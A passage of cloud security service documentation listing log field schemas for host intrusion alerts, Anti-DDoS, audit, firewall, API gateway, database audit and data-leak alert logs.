app_info | Object | Application information (fields listed under app_info below).
system_info | Object | System information (fields listed under system_info below).
process_info | List | Process information (fields listed under process_info below).
user_info | List | User information (fields listed under user_info below).
file_info | List | File information (fields listed under file_info below).
geo_info | Object | Geographic information (fields listed under geo_info below).
malware_info | Object | Malware information (fields listed under malware_info below).
forensic_info | String | Evidence collection field (fields listed under forensic_info below).
recommendation | String | Handling suggestions.
extend_info | String | Extended incident information.

Fields in resource_info

Field | Type | Description
---|---|---
project_id | String | Project ID.
region_name | String | Region name.
vpc_id | String | VPC ID.
host_name | String | Host name.
host_ip | String | Host IP address.
host_id | String | Host ID (ECS ID).
cloud_id | String | Cloud agent SN.
vm_name | String | VM name.
vm_uuid | String | VM UUID.
container_id | String | Container ID.
image_id | String | Image ID.
sys_arch | String | System CPU architecture.
os_bit | String | OS bit version.
os_type | String | OS type.
os_name | String | OS name.
os_version | String | OS version.

Fields in network_info

Field | Type | Description
---|---|---
local_address | String | Local address.
local_port | Integer | Local port.
remote_address | String | Remote address.
remote_port | Integer | Remote port.
src_ip | String | Source IP address.
src_port | Integer | Source port.
src_domain | String | Source domain.
dest_ip | String | Destination IP address.
dest_port | Integer | Destination port.
dest_domain | String | Destination domain.
protocol | String | Protocol.
app_protocol | String | Application layer protocol.
flow_direction | String | Flow direction.

Fields in app_info

Field | Type | Description
---|---|---
sql | String | Executed SQL statement.
domain_name | String | DNS domain name.
url_path | String | URL.
url_method | String | URL method.
req_refer | String | URL request referrer.
email_subject | String | Email subject.
email_sender | String | Email sender.
email_receiver | String | Email recipient.
email_keyword | String | Email keyword.

Fields in process_info

Field | Type | Description
---|---|---
process_name | String | Process name.
process_path | String | Process file path.
process_pid | Integer | Process ID.
process_uid | Integer | Process user ID.
process_username | String | Process username.
process_cmdline | String | Process command line.
process_filename | String | Process file name.
process_start_time | Long | Process start time.
process_gid | Integer | Process group ID.
process_egid | Integer | Effective process group ID.
process_euid | Integer | Effective process user ID.
parent_process_name | String | Parent process name.
parent_process_path | String | Parent process file path.
parent_process_pid | Integer | Parent process ID.
parent_process_uid | Integer | Parent process user ID.
parent_process_cmdline | String | Parent process command line.
parent_process_filename | String | Parent process file name.
parent_process_start_time | Long | Parent process start time.
parent_process_gid | Integer | Parent process group ID.
parent_process_egid | Integer | Effective parent process group ID.
parent_process_euid | Integer | Effective parent process user ID.
child_process_name | String | Subprocess name.
child_process_path | String | Subprocess file path.
child_process_pid | Integer | Subprocess ID.
child_process_uid | Integer | Subprocess user ID.
child_process_cmdline | String | Subprocess command line.
child_process_filename | String | Subprocess file name.
child_process_start_time | Long | Subprocess start time.
child_process_gid | Integer | Subprocess group ID.
child_process_egid | Integer | Effective subprocess group ID.
child_process_euid | Integer | Effective subprocess user ID.
virt_cmd | String | Virtualization command.
virt_process_name | String | Virtualization process name.
escape mode | String | Escape mode.
escape cmd | String | Command executed after the escape.

Fields in user_info

Field | Type | Description
---|---|---
user_id | Integer | User ID.
user_gid | Integer | User GID.
user_name | String | Username.
user_group_name | String | User group name.
user_home_dir | String | User home directory.
login_ip | String | User login IP address.
service_type | String | Login service type.
service_port | Integer | Login service port.
login_mode | String | Login mode.
login_lasttime | Long | Last login time of the user.
login_fail_count | Integer | Number of failed login attempts.
pwd_hash | String | Password hash (sensitive; restrict access to logs that carry this field).
pwd_with_fuzzing | String | Anonymized password.
pwd_used_days | Integer | Password age (days).
pwd_min_days | Integer | Minimum password validity period.
pwd_max_days | Integer | Maximum password validity period.
pwd_warn_left_days | Integer | Advance warning of password expiration (days).

Fields in file_info

Field | Type | Description
---|---|---
file_path | String | File path/name.
file_alias | String | File alias.
file_size | Integer | File size.
file_mtime | Long | Time when the file was last modified.
file_atime | Long | Time when the file was last accessed.
file_ctime | Long | Time when the file status last changed.
file_hash | String | File hash value.
file_md5 | String | File MD5 value.
file_sha256 | String | File SHA-256 value.
file_type | String | File type.
file_content | String | File content.
file_attr | String | File attribute.
file_operation | String | File operation type.
file_change_attr | String | Old/new attribute.
file_new_path | String | New file path.
file_desc | String | File description.
file_key_word | String | File keyword.
is_dir | Boolean | Whether the file is a directory.
fd_info | String | File handle information.
fd_count | Integer | Number of file handles.

Fields in forensic_info

Field | Type | Description
---|---|---
monitor_process | String | Monitoring process.
escape_mode | String | Escape mode.
abnormal_port | String | Abnormal port.

Fields in geo_info

Field | Type | Description
---|---|---
src_country | String | Source country/region.
src_city | String | Source city.
src_latitude | Long | Source latitude.
src_longitude | Long | Source longitude.
dest_country | String | Destination country/region.
dest_city | String | Destination city.
dest_latitude | Long | Destination latitude.
dest_longitude | Long | Destination longitude.

Fields in malware_info

Field | Type | Description
---|---|---
malware_family | String | Malware family.
malware_class | String | Malware classification.

Fields in system_info

Field | Type | Description
---|---|---
pwd_valid | Boolean | Whether the password is valid.
|
pwd_min_len |
Integer |
Password length. |
||
pwd_digit_credit |
Integer |
Digits contained in the password. |
||
pwd_uppercase_letter |
Integer |
Uppercase letters contained in the password. |
||
pwd_lowercase_letter |
Integer |
Lowercase letters contained in the password. |
||
pwd_special_characters |
Integer |
Special characters contained in the password. |
||
extend_info |
hit_rule |
String |
Hit rule. |
|
rule_name |
String |
Rule name. |
||
rulesetname |
String |
Rule set name. |
||
report_type |
String |
Reported data type. |
||
ti_info |
ti_source |
String |
Intelligence source. |
|
ti_class |
String |
Intelligence classification. |
||
ti_threat_type |
String |
Intelligence threat type. |
||
ti_first_time |
Long |
First detection time. |
||
ti_last_time |
Long |
Last detection time. |
sec-ddos-attack
Fields in Anti-DDoS attack logs
| Field | Type | Description |
|---|---|---|
| log_type | String | Log type |
| time | Date | Local time |
| device_ip | String | Device IP address |
| device_type | String | Device type (CLEAN: cleaning device; DETECT: detecting device) |
| direction | String | Log direction (inbound, outbound) |
| zone_id | String | Protected object ID |
| zone_name | String | Protected object name |
| zone_ip | String | IP address |
| biz_id | String | Business ID |
| is_deszone | String | Whether the traffic is network segment traffic (true, false) |
| is_ipLocation | String | Whether the traffic is geographical location traffic (true, false) |
| ipLocation_id | String | Geographical location ID |
| total_pps | String | Total rate in pps |
| total_kbps | String | Total rate in kbps |
| tcp_pps | String | Rate of TCP packets to the target (in pps) |
| tcp_kbps | String | Rate of TCP traffic to the target (in kbps) |
| tcpfrag_pps | String | Rate of TCP fragments to the target (in pps) |
| tcpfrag_kbps | String | Rate of TCP fragment traffic to the target (in kbps) |
| udp_pps | String | Rate of UDP packets to the target (in pps) |
| udp_kbps | String | Rate of UDP traffic to the target (in kbps) |
| udpfrag_pps | String | Rate of UDP fragments to the target (in pps) |
| udpfrag_kbps | String | Rate of UDP fragment traffic to the target (in kbps) |
| icmp_pps | String | Rate of ICMP packets to the target (in pps) |
| icmp_kbps | String | Total ICMP traffic to the target (in kbps) |
| other_pps | String | Rate of OTHER packets to the target (in pps) |
| other_kbps | String | Total OTHER traffic to the target (in kbps) |
| syn_pps | String | Number of SYN packets to the target (in pps) |
| synack_pps | String | Number of SYN/ACK packets to the target (in pps) |
| ack_pps | String | Rate of ACK packets to the target (in pps) |
| finrst_pps | String | Rate of FIN/RST packets to the target (in pps) |
| http_pps | String | Rate of HTTP packets to the target (in pps) |
| http_kbps | String | Rate of HTTP traffic to the target (in kbps) |
| http_get_pps | String | Total packet rate of HTTP requests to the target (in pps) |
| https_pps | String | Rate of HTTPS packets to the target (in pps) |
| https_kbps | String | Rate of HTTPS traffic to the target (in kbps) |
| dns_request_pps | String | Rate of DNS Query packets to the target (in pps) |
| dns_request_kbps | String | Rate of DNS Query traffic to the target (in kbps) |
| dns_reply_pps | String | Rate of DNS Reply packets to the target (in pps) |
| dns_reply_kbps | String | Rate of DNS Reply traffic to the target (in kbps) |
| sip_invite_pps | String | Rate of SIP packets to the target (in pps) |
| sip_invite_kbps | String | Rate of SIP traffic to the target (in kbps) |
| tcp_increase_con | String | Number of new TCP connections to the target per second |
| udp_increase_con | String | Number of new UDP connections to the target per second |
| icmp_increase_con | String | Number of new ICMP connections to the target per second |
| other_increase_con | String | Number of OTHER connections to the target per second |
| tcp_concur_con | String | Number of concurrent TCP connections to the target |
| udp_concur_con | String | Number of concurrent UDP connections to the target |
| icmp_concur_con | String | Number of concurrent ICMP connections to the target |
| other_concur_con | String | Number of concurrent OTHER connections to the target |
| total_average_pps | String | Average pps of all traffic to the target |
| total_average_kbps | String | Average kbps of all traffic to the target |
sec-cts-audit
Fields in CTS logs
| Field | Type | Description |
|---|---|---|
| time | Date | Time when an incident occurs. The value is the local standard time (GMT+local time zone), for example, 2022/11/08 11:24:04 GMT+08:00. |
| user | Object | Cloud account used to perform the recorded operation. |
| request | Object | Requested operation. |
| response | Object | Response to the request. |
| service_type | String | Operation source. |
| resource_type | String | Resource type. |
| resource_name | String | Resource name. |
| resource_id | String | Unique resource ID. |
| source_ip | String | IP address of the user who performs an operation. The value of this parameter is empty if the operation is triggered by the system. |
| trace_name | String | Operation name. |
| trace_rating | String | Level of an operation incident. The options are as follows: |
| trace_type | String | Operation type. The options are as follows: |
| api_version | String | API version of the cloud service on which an operation was performed. |
| message | Object | Supplementary information. |
| record_time | Long | Time when the operation was recorded, in the form of a timestamp. |
| trace_id | String | Unique operation ID. |
| code | Integer | HTTP return code, for example, 200 or 400. |
| request_id | String | Request ID. |
| location_info | String | Additional information required for fault locating after a request error. |
| endpoint | String | Endpoint of the page that displays details of cloud resources involved in this operation. |
| resource_url | String | Access link (excluding the endpoint) of the page that displays details of cloud resources involved in this operation. |
| user_agent | String | Type of OBS bucket-related operations that are not invoked using OBS SDKs. |
| content_length | Long | Length of the request body for performing operations on OBS buckets. |
| total_time | Long | Response time of the request in OBS bucket-related operations. |
sec-cfw-risk
Fields in CFW attack event logs
| Field | Type | Description |
|---|---|---|
| event_time | Date | Attack time |
| action | String | Response action of CFW |
| app | String | Application type |
| attack_rule | String | Defense rule that works for the detected attack |
| attack_rule_id | String | ID of the defense rule that works for the detected attack |
| attack_type | String | Type of the attack |
| dst_ip | String | Destination IP address |
| dst_port | String | Destination port number |
| packet | String | Original data packet of the attack log |
| protocol | String | Protocol type |
| level | String | Level of detected threats |
| source | String | Defense for the detected attack |
| src_ip | String | Source IP address |
| src_port | String | Source port number |
| direction | String | Flow direction |
sec-cfw-flow
Fields in CFW traffic logs
| Field | Type | Description |
|---|---|---|
| app | String | Application type |
| dst_ip | String | Destination IP address |
| dst_port | String | Destination port number |
| end_time | Date | Flow end time |
| protocol | String | Protocol type |
| to_c_bytes | String | Number of bytes sent from the server to the client |
| to_c_pkts | String | Number of packets sent from the server to the client |
| to_s_bytes | String | Number of bytes sent from the client to the server |
| to_s_pkts | String | Number of packets sent from the server to the client |
| src_ip | String | Source IP address |
| src_port | String | Source port number |
| start_time | Date | Flow start time |
sec-cfw-block
Fields in CFW access control logs
| Field | Type | Description |
|---|---|---|
| hit_time | Date | Time of access |
| action | String | Response action of CFW |
| app | String | Application type |
| dst_ip | String | Destination IP address |
| dst_port | String | Destination port number |
| protocol | String | Protocol type |
| rule_id | String | ID of the triggering rule |
| src_ip | String | Source IP address |
| src_port | String | Source port number |
sec-apig-access
Fields in API Gateway access logs
| Field | Type | Description |
|---|---|---|
| region_id | String | Site. |
| api_id | String | API ID. |
| body_bytes_sent | String | Response body size. |
| bytes_sent | String | Size of the entire response. |
| domain | String | Public network domain name. |
| errorType | String | Status of request throttling. Value 1 indicates that request throttling is enabled. |
| http_user_agent | String | User agent ID. |
| http_x_forwarded_for | String | X-Forwarded-For header. |
| opsuba_api_url | String | Request URI. |
| out_times | String | Time required for interaction between the gateway and peripheral components. |
| remote_addr | String | Remote IP address. |
| request_id | String | Request ID. |
| request_length | String | Size of the entire request. |
| request_method | String | HTTP request method. |
| request_time | String | Time required for access. |
| scheme | String | Protocol. |
| server_protocol | String | Request protocol. |
| status | String | Status. |
| time_local | Date | Time. |
| upstream_addr | String | Remote IP address. |
| upstream_connect_time | String | Time required for a remote connection. |
| upstream_header_time | String | Time required for receiving the header at the remote end. |
| upstream_response_time | String | Time required for returning a response from the remote end. |
| upstream_status | String | Remote status. |
| upstream_uri | String | Request backend URI. |
| user_name | String | Project ID or app ID of the user. |
sec-dbss-alarm
Fields in DBSS alert logs
| Field | Sub-field | Type | Description |
|---|---|---|---|
| domain_id | | String | Account ID |
| project_id | | String | Project ID |
| region | | String | Region |
| tenant_vpc_id | | String | VPC ID of the tenant |
| tenant_subnet_id | | String | Subnet ID of the tenant |
| instance_id | | String | Instance ID |
| instance_name | | String | Instance name |
| alarm | | Object | Alert object |
| source_type | | String | DBSS |
| alarm | alarm_risk | String | Severity |
| | client_ip | String | Connection IP address |
| | database_ip | String | IP address for accessing the database |
| | count | Long | Number of alerts |
| | user_name | String | Database username |
| | schema | String | Oracle schema |
| | rule_name | String | Rule name |
| | rule_id | String | Rule ID |
| | sql_type | String | SQL execution type |
| | sql_result | String | SQL execution result |
| | db_type | String | Database type |
sec-dsc-alarm
The reserved fields in DSC alert logs vary depending on the log types.
| Field | Type | Description |
|---|---|---|
| log_type | String | Alert type |
| region_id | String | Region |
| domain_id | String | Account ID |
| project_id | String | Project ID |
| leakage_ak | String | AK |
| source | String | Leakage source |
| find_time | String | Discovery time |
| account | String | Account name |
| file_name | String | File name |
| file_suffix | String | File name extension |
| leakage_user_id | String | Sub-user ID of the leakage |
| leakage_user_name | String | Sub-username of the leakage |
| leakage_domain_id | String | Leaked account ID |
| leakage_domain_name | String | Leaked account name |
| url | String | Website URL of the leakage |

| Field | Type | Description |
|---|---|---|
| log_type | String | Alert type |
| region_id | String | Region |
| domain_id | String | Account ID |
| project_id | String | Project ID |
| bucket_policy | String | Public bucket/Private bucket |
| bucket_domain_id | String | ID of the account that the bucket belongs to |
| bucket_project_id | String | ID of the project to which the bucket belongs |
| bucket_name | String | Bucket name |
| file_name | String | File name |
| file_path | String | File path |
| risk_level | Integer | Sensitive risk level |
| sensitive_data_type | String[] | Sensitive data type |
| privacy_detail | String | Personal privacy data details |
| file_type | String | File type |
| mimetypes | String | File type |
| rule_list | List<Map<String,String>> | List of matched rules |
| keyword | String | Keyword for matching sensitive data rules |
| available_zone | String | AZ |
| encrypted | String | Whether to encrypt data |

| Field | Type | Description |
|---|---|---|
| log_type | String | Alert type |
| region_id | String | Region |
| domain_id | String | Account ID |
| project_id | String | Project ID |
| vpc_id | String | VPC ID |
| db_instance_type | String | RDS PUB |
| db_instance_id | String | Database instance ID |
| db_instance_type | String | Database instance type |
| db_instance_ip | String | IP address of the database instance |
| db_instance_domain_id | String | ID of the account that the database instance belongs to |
| db_instance_project_id | String | ID of the project to which the database instance belongs |
| db_instance_name | String | Database instance name |
| db_name | String | Database name |
| table_name | String | Table name |
| field_name | String | Field name |
| data_type | String | Field data type |
| risk_level | Integer | Sensitive risk level |
| sensitive_data_type | String[] | Sensitive data type |
| privacy_detail | String | Personal privacy data details |
| rule_list | List<Map<String,String>> | List of matched rules |
| keyword | String | Keyword for matching sensitive data rules |